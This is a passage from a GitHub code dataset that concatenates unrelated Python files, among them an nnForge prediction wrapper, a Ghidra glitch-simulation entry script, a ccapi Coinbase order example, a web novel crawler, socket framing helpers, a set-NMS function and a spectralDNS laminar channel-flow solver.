''\n","repo_name":"crawlerwolf/toubiao","sub_path":"find_error.py","file_name":"find_error.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"13001176879","text":"import numpy as np\nimport subprocess\nimport os\nimport cv2\n\nclass Nnforge(object):\n\n \"\"\"This class is used to predict the class of input image.\n Internally, it uses nnForge, convolutional and fully-connected\n neural networks C++ library.\"\"\"\n\n # underlying network needs to be custom build to use special input subdirectory\n # in prediction\n def __init__(self,\n lock,\n isColor = True,\n bin_dir = \"/home/johannes/Lataukset/nnForge/bin\",\n input_directory=\"/home/johannes/nnforge_git/input_data/autoverkko/\",\n working_directory=\"/home/johannes/nnforge_git/working_data/autoverkko/\",\n ):\n\n self.bin_dir = bin_dir\n self.isColor = isColor\n self.binary = os.path.join(self.bin_dir, \"autoverkko\")\n self.i_dir = input_directory\n self.image_dir = os.path.join(input_directory, \"special\")\n self.w_dir = working_directory\n self.annotationfile = os.path.join(self.image_dir, \"annotation.csv\")\n self.lock = lock\n self.predictionfile = os.path.join(self.w_dir, \"prediction.csv\")\n self.classfile = os.path.join(self.w_dir, \"submission.csv\")\n\n #def fit(self, X, y):\n\n #X_all = np.concatenate([X, X_test])\n #y_all = y\n #y[y==0] = -1\n #y_all = np.concatenate([y_all, np.zeros(X_test.shape[0])])\n\n #dump_svmlight_file(X_all, y_all, self.inputfile, 
zero_based=False)\n\n\n #cmd = []\n #if self.C:\n #cmd = [\"svm_learn\",\n #\"-c\", str(self.C),\n #\"-t\", str(self.kernel),\n #\"-d\", \"2\",\n #\"-g\", \"1\",\n #\"-s\", \"1\",\n #\"-r\", \"1\",\n #self.inputfile,\n #self.modelfile]\n #else:\n #cmd = [\"svm_learn\",\n #\"-t\", str(self.kernel),\n #\"-d\", \"2\",\n #\"-g\", \"1\",\n #\"-s\", \"1\",\n #\"-r\", \"1\",\n #self.inputfile,\n #self.modelfile]\n\n #subprocess.call(cmd)\n #os.remove(self.inputfile)\n\n # returns probabilities\n # X is matrix of images, with dtype=uint8\n def predict_proba(self, X):\n lines = []\n with self.lock:\n self.__writeImages__(X)\n cmd_prep = [self.binary,\n \"prepare_testing_data\",\n \"--prediction_annotation\", os.path.basename(self.annotationfile),\n \"--testing_folder\", \"special\",\n \"--is_color\", \"true\" if self.isColor else \"false\",\n ]\n cmd_predict = [self.binary,\n \"test\"]\n subprocess.call(cmd_prep)\n subprocess.call(cmd_predict)\n lines = open(self.predictionfile, \"r\").readlines()\n predictions = [\",\".join(line.split(\",\")[1:]) for line in lines]\n predVek = [np.fromstring(line, sep=\",\") for line in predictions]\n predVek = np.vstack(predVek)\n\n return predVek\n\n # returns class labels\n def predict(self, X):\n lines = []\n with self.lock:\n self.__writeImages__(X)\n cmd_prep = [self.binary,\n \"prepare_testing_data\",\n \"--prediction_annotation\", os.path.basename(self.annotationfile),\n \"--testing_folder\", \"special\",\n \"--is_color\", \"true\" if self.isColor else \"false\",\n ]\n cmd_predict = [self.binary,\n \"test\"]\n subprocess.call(cmd_prep)\n subprocess.call(cmd_predict)\n lines = open(self.classfile, \"r\").readlines()\n predictions = [\",\".join(line.split(\",\")[1:]) for line in lines]\n predVek = [np.fromstring(line, dtype=np.int, sep=\",\") for line in predictions]\n predVek = np.vstack(predVek)\n\n return predVek\n\n def __writeImages__(self, X):\n f = open(self.annotationfile, \"w\")\n for i in range(X.shape[0]):\n imgName = os.path.join(self.image_dir, \"image{0}.png\".format(i))\n cv2.imwrite(imgName, X[i,...])\n f.write(imgName + \",0\\n\")\n f.close()\n\n","repo_name":"TeMaVa/Annotator","sub_path":"NnforgeWrapper.py","file_name":"NnforgeWrapper.py","file_ext":"py","file_size_in_byte":4219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42656963429","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def recoverTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n nodes, vals = [], []\n self.inorder(root, nodes, vals)\n vals.sort()\n for i, node in enumerate(nodes):\n node.val = vals[i]\n \n def inorder(self, root, nodes, vals):\n if root is not None:\n self.inorder(root.left, nodes, vals)\n nodes.append(root)\n vals.append(root.val)\n self.inorder(root.right, nodes, vals)","repo_name":"maruichen2004/LeetCode","sub_path":"Recover_Binary_Search_Tree.py","file_name":"Recover_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23847426254","text":"from analyzer import Analyzer\nimport yaml\nimport sys\n\n\nif __name__ == '__main__':\n \"\"\"\n This tool is used by the ghidra plugin to find glitches. 
argv[1] needs to be the path to the yaml exported by the plugin\n \"\"\"\n # get the yaml_path from argv\n yaml_path = sys.argv[1]\n print(f\"loading yaml from {yaml_path}\\n\")\n # load the yaml file\n yaml_file = open(f\"{yaml_path}/export.yaml\", 'r')\n # convert the yaml into a dictionary.\n # unsafe load needs to be used since the yaml contains code that needs to be executed\n options = yaml.unsafe_load(yaml_file)\n\n # Hack to get custom functions working. This only works in __main__ but not in other functions\n if not options[\"findOptions\"][\"useCustomFindFunction\"]:\n # if a find address is used set it in options\n options[\"find\"] = int(options[\"findOptions\"][\"findAddress\"], 16)\n else:\n # if a custom find function is used load it using exec and store it in options\n custom_find = ()\n print(custom_find)\n exec(options[\"findOptions\"][\"customFindFunction\"])\n print(custom_find)\n options[\"find\"] = custom_find\n\n # create the analyzer object that is used to simulate the glitches\n analyzer = Analyzer(options)\n\n # actually search for glitches\n found = analyzer.glitch()\n\n # write the found glitches back to yaml\n output_file = open(f\"{yaml_path}/output.yaml\", \"w\")\n yaml.safe_dump(found, output_file)\n\n","repo_name":"nikals99/fault-injection-simulation","sub_path":"py_scripts/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73188260890","text":"import os\nimport sys\nimport time\nfrom ccapi import EventHandler, SessionOptions, SessionConfigs, Session, Subscription, Request, Event, Message\n\n\nclass MyEventHandler(EventHandler):\n def __init__(self):\n super().__init__()\n\n def processEvent(self, event: Event, session: Session) -> bool:\n if event.getType() == Event.Type_SUBSCRIPTION_STATUS:\n print(f\"Received an event of type SUBSCRIPTION_STATUS:\\n{event.toStringPretty(2, 2)}\")\n message = event.getMessageList()[0]\n if message.getType() == Message.Type_SUBSCRIPTION_STARTED:\n request = Request(Request.Operation_CREATE_ORDER, \"coinbase\", \"BTC-USD\")\n request.appendParam(\n {\n \"SIDE\": \"BUY\",\n \"LIMIT_PRICE\": \"20000\",\n \"QUANTITY\": \"0.001\",\n }\n )\n session.sendRequest(request)\n elif event.getType() == Event.Type_SUBSCRIPTION_DATA:\n print(f\"Received an event of type SUBSCRIPTION_DATA:\\n{event.toStringPretty(2, 2)}\")\n return True # This line is needed.\n\n\nif __name__ == \"__main__\":\n if not os.environ.get(\"COINBASE_API_KEY\"):\n print(\"Please set environment variable COINBASE_API_KEY\", file=sys.stderr)\n sys.exit(1)\n if not os.environ.get(\"COINBASE_API_SECRET\"):\n print(\"Please set environment variable COINBASE_API_SECRET\", file=sys.stderr)\n sys.exit(1)\n if not os.environ.get(\"COINBASE_API_PASSPHRASE\"):\n print(\"Please set environment variable COINBASE_API_PASSPHRASE\", file=sys.stderr)\n sys.exit(1)\n eventHandler = MyEventHandler()\n option = SessionOptions()\n config = SessionConfigs()\n session = Session(option, config, eventHandler)\n subscription = Subscription(\"coinbase\", \"BTC-USD\", \"ORDER_UPDATE\")\n session.subscribe(subscription)\n time.sleep(10)\n session.stop()\n print(\"Bye\")\n","repo_name":"crypto-chassis/ccapi","sub_path":"binding/python/example/execution_management_simple_subscription/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","stars":465,"dataset":"github-code","pt":"32"} 
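A short aside on the Ghidra glitch-finder entry point above (the script that calls yaml.unsafe_load): its author notes that rebinding custom_find through a bare exec() "only works in __main__" — expected CPython behavior, since exec() cannot reliably rebind a function-local name. A minimal, hedged sketch of the conventional workaround, passing an explicit namespace dict to exec(); the option keys mirror that script, and the assumption (not guaranteed by the source) is that the YAML snippet defines a function literally named custom_find:

# Sketch only: bind the exec-defined function via an explicit namespace,
# so the pattern works inside any function, not just at module scope.
namespace = {}
exec(options["findOptions"]["customFindFunction"], namespace)
options["find"] = namespace["custom_find"]  # KeyError here means the snippet defined a different name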
+{"seq_id":"74102746651","text":"# Faça um programa que leia a largura e a altura de uma parede em metros,\n# calcule a sua área e a quantidade de tinta necessária para pintá-la,\n# sabendo que cada litro de tinta pinta uma área de 2 metros quadrados.\n\nlargura = float(input('Qual a largura da parede? '))\naltura = float(input('Qual a altura da parede? '))\nàrea = altura * largura\n\nprint('Dada a largura {}, e a altura {}, têm-se {} m² de àrea'.format\n (largura, altura, àrea))\ntinta = àrea/2\nprint('Para pintar esta parede você precisará de {} L de tinta'.format(tinta))\n","repo_name":"luiz-D-silva/Guanabara_exerc-cios","sub_path":"011.Pintando a parede (calcúlo de àrea).py","file_name":"011.Pintando a parede (calcúlo de àrea).py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32594674284","text":"from __future__ import annotations\n\nfrom prettyqt.qt import QtCore\n\n\nclass Property(QtCore.Property):\n \"\"\"Template class that enables automatic property bindings.\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.doc = kwargs.get(\"doc\")\n super().__init__(*args, **kwargs)\n\n @classmethod\n def get_doc_dict(cls, klass: type):\n import inspect\n\n return {\n name: member.doc\n for name, member in inspect.getmembers(klass)\n if isinstance(member, cls) and hasattr(member, \"doc\")\n }\n\n\nif __name__ == \"__main__\":\n prop = Property(int)\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/core/property.py","file_name":"property.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"26978537839","text":"from email.charset import Charset\nimport requests\nimport time\nfrom lxml import etree\nfrom urllib.parse import urljoin\n\nurl = input()\n\ndef url_response(url):\n headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.53'}\n time.sleep(5)\n try:\n response = requests.get(url,headers=headers)\n except :\n time.sleep(60)\n response = requests.get(url,headers=headers)\n response=response.text\n #response = response.encode('iso-8859-1')\n #response = response.decode('gbk').encode('utf8').decode('utf8')\n html=etree.HTML(response)\n return html\n\ndef url_a(html):\n xp = html.xpath('//a/@href')\n url = xp[22]\n return url\n\ndef url_url(a,url):\n return urljoin(url, a)\n\ndef url_title(html):\n title = html.xpath('//div/text()')\n title = title[16]\n return title\n\ndef url_essay(html):\n essay = html.xpath('//div[@id=\"content\"]/p/text()')\n return essay\n\nwhile True:\n xie_ru = open('text.txt','a')\n html = url_response(url)\n a = url_a(html)\n url = url_url(a,url)\n title = url_title(html)\n essay = url_essay(html)\n xie_ru.write((title + '\\n'))\n print(title)\n print(essay)\n print(url)\n for aaa in range(len(essay)):\n essayx = essay[aaa]\n try:\n xie_ru.write(essayx+ '\\n')\n except:\n pass\n del essay\n xie_ru.close()\n","repo_name":"youdianhuaier/python-crawler","sub_path":"python-crawler/python_crawler.py","file_name":"python_crawler.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25859218255","text":"from django.conf.urls import url\n\nfrom . 
import views\n\nfrom discussions.views import discussions, single_discuss\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),\n    url(r'logout/$', views.user_logout, name='user_logout'),\n\n    url(r'about_me/$', views.about_me, name='about_me'),\n\n    url(r'articles/$', views.articles, name='articles'),\n    url(r'articles/(?P<slug>[\\w-]+)/$',\n        views.single_article, name='single_article'),\n\n    url(r'tags/$', views.tag_list, name='tag_list'),\n    url(r'tags/(?P<slug>[\\w-]+)/$',\n        views.article_by_tag, name='article_by_tag'),\n\n    url(r'tutorials/$', views.tutorials, name='tutorials'),\n\n    url(r'discussions/$', discussions, name='discussions'),\n    url(r'discussions/(?P<slug>[\\w-]+)/$',\n        single_discuss, name='single_discuss'),\n]\n","repo_name":"khizirsiddiqui/dreamlandmks","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6883853343","text":"import socket\nfrom message import AppMessage\n\n\nHEADER_SIZE = 4\n\ndef recv_bytes(soc: socket.socket, req_size):\n    buf = bytearray()\n    cnt = 0\n    total_bytes_count = 0\n    while len(buf) < req_size:\n        received = soc.recv(req_size - total_bytes_count)\n        if len(received) == 0:\n            cnt += 1\n            if cnt >= 10:\n                raise Exception('received 0 for 10 times')\n        buf.extend(received)\n        total_bytes_count += len(received)\n    return buf\n\ndef recv_body_size(soc: socket.socket):\n    header_bytes = recv_bytes(soc, HEADER_SIZE)\n    return bytes_to_int(header_bytes)\n\ndef recv_message(soc):\n    body_size = recv_body_size(soc)\n    body = recv_bytes(soc, body_size)\n    msg = AppMessage.restore_message(body)\n    print('Received:', msg)\n    return msg\n\n\ndef bytes_to_int(_bytes):\n    return int.from_bytes(_bytes, byteorder='big')\n\ndef int_to_bytes(num, byte_count):\n    return num.to_bytes(byte_count, byteorder='big')\n\ndef send_bytes(soc, body):\n    body_size = len(body)\n    header_bytes = int_to_bytes(body_size, 4)\n    message = bytearray(header_bytes + body)\n    message_length = len(message)\n    # res = soc.send(bytearray(header_bytes))\n    # soc.send(body)\n    # res = soc.send(bytearray(header_bytes))\n\n    totalsent = 0\n    while totalsent < message_length:\n        sent = soc.send(message[totalsent:])\n        if sent == 0:\n            raise RuntimeError(\"socket connection broken\")\n        totalsent = totalsent + sent\n\n\ndef send_message(soc, msg: AppMessage):\n    print('Sent:', msg)\n    send_bytes(soc, msg.to_bytes())\n","repo_name":"misebox/tcpgame","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70129904732","text":"# -*- coding: UTF-8 -*-\n\"\"\"\n    @Author : Frank.Ren\n    @Project : standford_cs329p \n    @Product : PyCharm\n    @createTime : 2023/9/1 14:21 \n    @Email : sc19lr@leeds.ac.uk\n    @github : https://github.com/frankRenlf\n    @Description : \n\"\"\"\n\nfrom selenium import webdriver\n\nif __name__ == \"__main__\":\n    chrome_options = webdriver.ChromeOptions()\n    chrome_options.headless = True\n\n    chrome = webdriver.Chrome(chrome_options=chrome_options)\n\n    url = 'https://www.zillow.com/stanford-ca/sold/'\n    page = chrome.get(url)\n\n    house_id_url = 'https://www.zillow.com/homedetails/19506780_zpid/'\n","repo_name":"frankRenlf/standford_cs329p","sub_path":"web_scraping.py","file_name":"web_scraping.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
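The common.py module above implements a small length-prefixed framing protocol: each message on the wire is a 4-byte big-endian size header followed by exactly that many body bytes. A minimal, hedged loopback sketch of that wire format; socket.socketpair() stands in for a real connection and plain bytes stand in for AppMessage, so the sketch stays self-contained:

import socket

def frame(payload: bytes) -> bytes:
    # 4-byte big-endian length header, matching send_bytes() above
    return len(payload).to_bytes(4, byteorder="big") + payload

a, b = socket.socketpair()
a.sendall(frame(b"hello"))
size = int.from_bytes(b.recv(4), byteorder="big")  # read the header first
body = b.recv(size)                                # then the body
assert body == b"hello"
a.close()
b.close()

For real traffic the looping recv_bytes() above is the safer read path, since a single recv() may legally return fewer bytes than requested.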
+{"seq_id":"14730577790","text":"# py2exe compilation file\r\n\r\nfrom distutils.core import setup\r\nimport py2exe\r\n\r\nimport sys; sys.argv.append('py2exe')\r\n\r\nMydata_files = [('LogoCampusNetDrop.png')]\r\npy2exe_options = dict(\r\n dll_excludes=[\"MSVCP90.dll\"], # Exclude msvcr71\r\n compressed=True, # Compress library.zip\r\n )\r\n\r\nsetup(name='CampusNetDrop',\r\n version='1.0',\r\n description='CampusNetDrop',\r\n author='Rasmus Jones',\r\n windows=[{\r\n \t\t\t\"script\": \"CampusNetDrop.py\",\r\n \t\t\t#'uac_info': \"requireAdministrator\",\r\n \t\t\t\"icon_resources\": [(1, \"icon.ico\")]\r\n \t\t\t}],\r\n data_files = Mydata_files,\r\n options={'py2exe': py2exe_options},\r\n )","repo_name":"Rassibassi/CampusNetDrop","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"9947911210","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n merged = \"\"\n pointer1 = 0\n pointer2 = 0\n maximum = max(len(word1),len(word2))\n i = 0\n while i < maximum:\n if pointer1 < len(word1):\n merged+=word1[pointer1]\n pointer1 +=1\n if pointer2 < len(word2):\n merged+=word2[pointer2]\n pointer2 +=1\n i += 1\n return merged\n","repo_name":"Gizaw-Agodo/A2sV","sub_path":"community-leetcode/1768-merge-alternatively.py","file_name":"1768-merge-alternatively.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"12573593310","text":"from aiohttp import web\nfrom routes import setup_routes\nfrom external.postgres import PostgresEngine\nimport yaml\nimport pathlib\n\n\nasync def init_pg(app):\n database_config = app['config']['postgres']\n postgres = PostgresEngine()\n await postgres.setup({\n 'min_con': database_config['minsize'],\n 'max_con': database_config['maxsize'],\n 'name': database_config['database'],\n 'username': database_config['user'],\n 'password': database_config['password'],\n 'host': database_config['host'],\n 'port': database_config['port'],})\n app['db'] = postgres\n\n\ndef load_config(path):\n with open(path, \"r\") as ymlfile:\n cfg = yaml.load(ymlfile, Loader=yaml.FullLoader)\n return cfg\n\n\ndef init_app(config=None):\n app = web.Application()\n conf = load_config(str(pathlib.Path('.') / 'config' / 'default.yaml'))\n app['config'] = conf\n app.on_startup.append(init_pg)\n setup_routes(app)\n return app\n\n\ndef start():\n app = init_app()\n web.run_app(app, host='0.0.0.0', port=8080)\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"dsoldatow/doc-backend","sub_path":"doc-backend/src/app/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37348436907","text":"import numpy as np\n\ndef set_cpu_nms(self, dets, thresh):\n \"\"\"\n :dets: 二维numpy.ndarray, 每行6列 [x,y,w,h,score,number],需要保证在同一个set里的boxes的number是唯一的\n :return: bool 型numpy.ndarray, the index of keepded boxes.\n \"\"\"\n def _overlap(det_boxes, basement, others):\n eps = 1e-8\n x1_basement, y1_basement, x2_basement, y2_basement \\\n = det_boxes[basement, 0], det_boxes[basement, 1], \\\n det_boxes[basement, 2], det_boxes[basement, 3]\n x1_others, y1_others, x2_others, y2_others \\\n = det_boxes[others, 0], det_boxes[others, 1], \\\n det_boxes[others, 2], det_boxes[others, 3]\n areas_basement = (x2_basement - 
x1_basement) * (y2_basement - y1_basement)\n areas_others = (x2_others - x1_others) * (y2_others - y1_others)\n xx1 = np.maximum(x1_basement, x1_others)\n yy1 = np.maximum(y1_basement, y1_others)\n xx2 = np.minimum(x2_basement, x2_others)\n yy2 = np.minimum(y2_basement, y2_others)\n w = np.maximum(0.0, xx2 - xx1)\n h = np.maximum(0.0, yy2 - yy1)\n inter = w * h\n ovr = inter / (areas_basement + areas_others - inter + eps)\n return ovr\n scores = dets[:, 4]\n order = np.argsort(-scores)\n dets = dets[order] #按score从大到小排序\n #change to l t r d\n dets[:,2] = dets[:,2]+dets[:,0]\n dets[:,3] = dets[:,3]+dets[:,1]\n\n numbers = dets[:, -1] # set number\n keep = np.ones(len(dets)) == 1 # keep all at begining\n ruler = np.arange(len(dets)) # ruler = index of order # [0,1,2,3,4.....len]\n while ruler.size>0:\n basement = ruler[0]\n ruler=ruler[1:]\n num = numbers[basement]\n # calculate the body overlap\n overlap = _overlap(dets[:, :4], basement, ruler)\n indices = np.where(overlap > thresh)[0] \n loc = np.where(numbers[ruler][indices] == num)[0] \n # the mask won't change in the step\n mask = keep[ruler[indices][loc]]\n keep[ruler[indices]] = False\n keep[ruler[indices][loc][mask]] = True\n ruler[~keep[ruler]] = -1\n ruler = ruler[ruler>0]\n keep = keep[np.argsort(order)]\n return keep","repo_name":"Harzva/gigavision","sub_path":"my_tools/set_nms.py","file_name":"set_nms.py","file_ext":"py","file_size_in_byte":2403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"9256048676","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 15 10:09:08 2020\r\n\r\n@author: straw\r\n\"\"\"\r\nentry = input(\"Please enter the desired content :\")\r\nfile = open(\"output.txt\", \"w\")\r\nfile.write(entry)\r\nfile.close()\r\n\r\n","repo_name":"kawthar-eltarr/AI-Runtrack-1","sub_path":"jour03/create_output.py","file_name":"create_output.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5176884173","text":"import unittest, os, sys\nfrom custom_test_case import CustomTestCase\n\nPROJECT_ROOT = os.path.dirname(__file__)\nsys.path.append(os.path.join(PROJECT_ROOT, \"..\"))\n\nfrom CodeConverter import CodeConverter\n\nclass TestBugfix(unittest.TestCase, CustomTestCase):\n\n # For Bugfix\n def test_string_including_spaces(self):\n source = '[[UIAlertView alloc] initWithTitle:@\"Warning\" message:@\" too many alerts! \\\" \"];'\n expected = 'UIAlertView.alloc.initWithTitle(\"Warning\",message:\" too many alerts! 
\\\" \");'\n self.assertSentence(CodeConverter(source).replace_nsstring().convert_square_brackets_expression().s, expected)\n\n def test_multiline_with_block_arg_wont_join_lines(self):\n source = \"\"\"[UIView animateWithDuration:0.2\n animations:^{view.alpha = 0.0;}]\n\"\"\"\n expected = \"\"\"[UIView animateWithDuration:0.2 animations:^{view.alpha = 0.0;}]\n\"\"\"\n self.assertSentence(CodeConverter(source).multilines_to_one_line().s, expected)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"kyamaguchi/SublimeObjC2RubyMotion","sub_path":"tests/test_bugfix.py","file_name":"test_bugfix.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"32"} +{"seq_id":"8184185815","text":"from tempfile import mkdtemp\n\nENV = 'development'\nDEBUG = True\nuri = 'postgres://postgres:11986143@127.0.0.1:5432/project0'\nSQLALCHEMY_DATABASE_URI = uri\nSECRET_KEY = 'Thisisasecret!'\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nTEMPLATES_AUTO_RELOAD = True\nSESSION_PERMANENT = False\nSQLALCHEMY_ECHO = True\n\n# Configure session to use filesystem (instead of signed cookies)\nSESSION_FILE_DIR = mkdtemp()\nSESSION_PERMANENT = False\nSESSION_TYPE = \"filesystem\"\n","repo_name":"no-trbl-2-u/project0","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2779752539","text":"import re\nimport pandas as pd\n\n\npattern = re.compile('.*?(\\w+).*?(-?\\d+.\\d+)')\nresults = []\n\nfor model in 'retinanet', 'fasterrcnn':\n with open(f'./{model}_mean_ap.txt') as f:\n for line in f:\n match = pattern.match(line)\n if match:\n metric, value = match.groups()\n if not metric.endswith(('highlighter', 'spoon', 'candle')):\n results.append((model, metric, float(value)))\n\ndf = (\n pd.DataFrame(results, columns=['Model', 'Metric', 'Value'])\n .set_index(['Model', 'Metric'])\n .unstack('Model')\n .rename(columns={'retinanet': 'RetinaNet', 'fasterrcnn': 'Faster R-CNN'}) # type: ignore\n)\n\n\ndf.index = (\n df.index\n .str.replace('test_', '')\n .str.replace('map', 'mAP')\n .str.replace('mar', 'mAR')\n .str.replace('class_', '')\n .str.replace('_(?=\\d)', '@')\n .str.replace('_', ' ')\n)\n\ndf = df.droplevel(0, axis='columns') # type: ignore\ndf.columns.name = None\n\n\nlatex = df.style.format(precision=3).to_latex(hrules=True) # type: ignore\nprint(latex)\n","repo_name":"k-papadakis/geospatial-labs","sub_path":"5-object-detection/latex/conversions/results_to_latex.py","file_name":"results_to_latex.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"18945791742","text":"\"\"\"Transient laminar channel flow\"\"\"\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cbook\nfrom spectralDNS import config, get_solver, solve\nwarnings.filterwarnings(\"ignore\", category=matplotlib.cbook.mplDeprecation)\n\ndef initialize(U, U_hat, **context):\n U_hat[:] = 0\n U[:] = 0\n\ndef set_Source(Source, Sk, FST, ST, **context):\n Source[:] = 0\n Source[1, :] = -2./config.params.Re\n Sk[:] = 0\n Sk[1] = FST.scalar_product(Source[1], Sk[1])\n\ndef exact(x, Re, t, num_terms=400):\n beta = 2./Re\n u = np.zeros(len(x))\n for i in range(1, 2*num_terms, 2):\n lam_k = (2*i-1)*np.pi/2.\n lam_kp = (2*(i+1)-1)*np.pi/2.\n u[:] -= 
np.cos(lam_k*x)*np.exp(-config.params.nu*lam_k**2*t)/lam_k**3\n u[:] += np.cos(lam_kp*x)*np.exp(-config.params.nu*lam_kp**2*t)/lam_kp**3\n u *= (2*beta)/config.params.nu\n u += beta/2./config.params.nu*(1-x**2)\n return u\n\ndef reference(Re, t, num_terms=200):\n u = 1.0\n c = 1.0\n for n in range(1, 2*num_terms, 2):\n a = 32. / (np.pi**3*n**3)\n b = (0.25/Re)*np.pi**2*n**2\n c = -c\n u += a*np.exp(-b*t)*c\n return u\n\nim1 = None\ndef update(context):\n global im1\n params = config.params\n solver = config.solver\n X = context.X\n U = solver.get_velocity(**context)\n if (params.tstep % params.plot_step == 0 and params.plot_step > 0 or\n params.tstep % params.compute_energy == 0):\n U = solver.get_velocity(**context)\n\n if im1 is None and solver.rank == 0 and params.plot_step > 0:\n plt.figure(1)\n #im1 = plt.contourf(X[1][:,:,0], X[0][:,:,0], context.U[1,:,:,0], 100)\n #plt.colorbar(im1)\n #plt.draw()\n #plt.pause(1e-6)\n u_exact = exact(X[0][:, 0, 0], params.Re, params.t)\n plt.plot(X[0][:, 0, 0], U[1, :, 0, 0], 'r', X[0][:, 0, 0], u_exact, 'b')\n\n if params.tstep % params.plot_step == 0 and solver.rank == 0 and params.plot_step > 0:\n #im1.ax.clear()\n #im1.ax.contourf(X[1][:,:,0], X[0][:,:,0], U[1, :, :, 0], 100)\n #im1.autoscale()\n #plt.pause(1e-6)\n plt.figure(1)\n u_exact = exact(X[0][:, 0, 0], params.Re, params.t)\n plt.plot(X[0][:, 0, 0], U[1, :, 0, 0], 'r', X[0][:, 0, 0], u_exact, 'b')\n plt.draw()\n plt.pause(1e-6)\n\n if params.tstep % params.compute_energy == 0:\n u0 = U[1, :, 0, 0].copy()\n uall = None\n if solver.rank == 0:\n uall = np.zeros((solver.num_processes, params.N[0]//solver.num_processes))\n solver.comm.Gather(u0, uall, root=0)\n\n if solver.rank == 0:\n uall = uall.reshape((params.N[0],))\n x0 = context.X[0][:, 0, 0]\n #x = x0\n #pc = zeros(len(x))\n #pc = ST.fct(uall, pc) # Cheb transform of result\n #solution at x = 0\n #u = n_cheb.chebval(0, pc)\n u_exact = exact(x0, params.Re, params.t)\n #print u_exact-uall\n #u_exact = reference(params.Re, params.t)\n print(\"Time %2.5f Error %2.12e \" %(params.t, np.sqrt(np.sum((u_exact-uall)**2)/params.N[0])))\n\ndef regression_test(context):\n params = config.params\n solver = config.solver\n U = solver.get_velocity(**context)\n u0 = U[1, :, 0, 0].copy()\n uall = None\n if solver.rank == 0:\n uall = np.zeros((solver.num_processes, params.N[0]//solver.num_processes))\n\n solver.comm.Gather(u0, uall, root=0)\n if solver.rank == 0:\n uall = uall.reshape((params.N[0],))\n x0 = context.X[0][:, 0, 0]\n #x = x0\n #pc = zeros(len(x))\n #pc = ST.fct(uall, pc) # Cheb transform of result\n #solution at x = 0\n #u = n_cheb.chebval(0, pc)\n #u_exact = reference(params.Re, params.t)\n u_exact = exact(x0, params.Re, params.t)\n print(\"Computed error = %2.8e %2.8e \" %(np.sqrt(np.sum((uall-u_exact)**2)/params.N[0]), params.dt))\n\nif __name__ == \"__main__\":\n config.update(\n {'Re': 800.,\n 'nu': 1./800., # Viscosity\n 'dt': 0.5, # Time step\n 'T': 50., # End time\n 'L': [2, 2*np.pi, 4*np.pi/3.],\n 'M': [6, 5, 2]\n }, \"channel\"\n )\n config.channel.add_argument(\"--compute_energy\", type=int, default=5)\n config.channel.add_argument(\"--plot_step\", type=int, default=10)\n solver = get_solver(update=update, regression_test=regression_test, mesh=\"channel\")\n context = solver.get_context()\n initialize(**context)\n set_Source(**context)\n solve(solver, 
